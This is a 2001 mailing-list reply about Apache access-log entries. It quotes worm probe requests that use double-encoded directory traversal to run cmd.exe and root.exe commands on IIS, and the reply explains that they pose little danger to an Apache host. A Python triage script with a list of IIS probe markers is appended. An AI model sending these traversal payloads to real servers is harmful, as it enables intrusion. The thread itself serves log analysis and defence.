Re: Being cracked? (need help on apache log files)
OSS> We just got our ADSL and now have a server running Apache on a potato box
OSS> at home. DynDNS provides us with dynamic dns.
OSS> Today I found these lines in my access.log:
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
OSS> and so on. To me it looks as if 213.145.168.244 is trying
OSS> to execute some file giving him root access. Is someone trying to
OSS> crack my machine? What should I do?
Ignore it. It is a worm which tries to hack IIS. Since you are running
Debian + Apache you are hardly in danger.
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| Ilya Martynov (http://martynov.org/) |
| GnuPG 1024D/323BDEE6 D7F7 561E 4C1D 8A15 8E80 E4AE BE1A 53EB 323B DEE6 |
| AGAVA Software Company (http://www.agava.com/) |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
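
One way to triage entries like the ones quoted above, as an added example that is not part of the original message: it groups IIS-style probes by source address and reports any that did not get a 404, which is the case worth a closer look. The marker list and function names are assumptions chosen for this thread's log lines; the last sample line is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')
# Paths and file names from the probes quoted in this thread (assumed marker list;
# none of them exist on a stock Apache host).
IIS_MARKERS = ("root.exe", "cmd.exe", "/_vti_bin/", "/_mem_bin/", "/msadc/")

def decode_fully(path, rounds=3):
    """Undo nested percent-encoding such as %255c -> %5c -> backslash."""
    for _ in range(rounds):
        path = unquote(path)
    return path

def triage(lines):
    """Group IIS-style probes by source; record any that did not return 404."""
    report = defaultdict(lambda: {"probes": 0, "traversal": 0, "non_404": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue
        host, raw_path, status = m.groups()
        path = decode_fully(raw_path).lower()
        if not any(marker in path for marker in IIS_MARKERS):
            continue
        entry = report[host]
        entry["probes"] += 1
        if "..\\" in path or "../" in path:
            entry["traversal"] += 1
        if status != "404":  # the server answered with something other than "not found"
            entry["non_404"].append((status, raw_path))
    return dict(report)

# Log lines from the post (unwrapped), plus one constructed ordinary request.
SAMPLE = [
    '213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249',
    '213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249',
    '192.0.2.10 - - [29/Oct/2001:12:55:02 +0100] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for host, e in triage(SAMPLE).items():
        print(host, e["probes"], "probes,", e["traversal"], "traversal,", len(e["non_404"]), "non-404")
```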